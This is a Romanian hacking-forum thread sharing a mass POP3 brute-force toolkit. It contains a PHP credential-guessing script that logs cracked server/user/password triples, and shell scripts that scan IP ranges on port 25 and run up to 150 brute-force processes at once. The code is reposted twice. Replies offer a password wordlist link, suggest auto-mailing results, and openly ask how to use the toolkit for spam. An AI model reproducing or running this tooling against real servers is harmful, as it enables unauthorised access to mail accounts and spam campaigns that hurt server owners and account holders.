UstupidMF Posted September 14, 2010 Report Posted September 14, 2010 L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidone Quote
Zatarra Posted September 16, 2010 Report Posted September 16, 2010 Mersi. O sa`l probez mai pe seara si revin cu edit. Din cate vad eu iti trebuie si un pass_file. Quote
codehunter Posted October 2, 2010 Report Posted October 2, 2010 deci? ceva interesant ... iese de un mass brute force ? Quote
napoletanii Posted December 8, 2010 Report Posted December 8, 2010 ftp://ftp2.msk.ru.openwall.com/pub/wordlists/all.gz pass file .. Quote
johnyinc Posted December 9, 2010 Report Posted December 9, 2010 fisierul "Ss" ( synscan ) il poti lua de pe google, ultima versiune si ti-o compileziin legatura cu scriptul, ce pot sa zic este ca il folosesc de aprox 2 aniface brute force pt Pop3, din 3000 aproximativ, cam 200 sunt si smtp-uri, deci mare treaba cu el nu ecum a zis OP, nu e asa usor incat sa schimbi portul si face brute pt ssh, ftp sau altele, e doar pt Pop3ar fi frumos daca cineva s-ar ocupa sa ii schimbe socket-urile pt comenzile care se dau prin smtp, in base64le am eu, doar ca nu ma pricep sa fac astaun sfat pentru cei care il folosesc : bagati-va si functia mail() in script, sa numai stai toata ziua sa verificati loguri prin rooturi sau shelluri Quote
ciuturax Posted February 10, 2011 Report Posted February 10, 2011 Download smtpnou.tgz for free on Filesonic.comDownload pop3.tar.gz for free on Filesonic.com... Quote
maxvolrat Posted February 14, 2011 Report Posted February 14, 2011 How to use it ? ... How to install? , any manual or tutorial ? Quote
doiulyka Posted June 2, 2011 Report Posted June 2, 2011 reuploadeaza si tu smtp scan sa vad despre ce e vb. Merci! Quote
sectorzueira Posted October 14, 2011 Report Posted October 14, 2011 Can you give it to UBUNTU 11.04 ? Thanks, in ubuntu no save ip's on txt...sorry to myd bad english. cat vuln.txt = 0 ip's ;/ in centos = 100% in ubuntu =0% help me please L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidone Quote
valdez2020 Posted October 15, 2011 Report Posted October 15, 2011 L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidoneSalut , cum pot sa fac spam cu mass bruteforcer, ma puteti ajuta si pe mine ? Quote
icemerc Posted October 16, 2011 Report Posted October 16, 2011 nu sunt arhivele up , zice ca sunt sterse Quote
Rumy Posted October 27, 2011 Report Posted October 27, 2011 Pe 23 scaneaza telnet sau ssh ? Din cate stiu nu exista sursa pt scanner pt telnet 23 si asta cred ca prinde smtp ftp ssh22 https,etc.. adik iti probeaza pe toate? Am un scanner la fel si deaia zic ca e cam la fel. Stie cineva daca exista vreun scanner sau ceva de genu pt telnet 23 sau sa ii poti schimba tu portu pe care vrei sa scanezi ? Quote
Geokm5 Posted October 30, 2011 Report Posted October 30, 2011 vreau si eu link-u pentr mass bruteforcer asta. Quote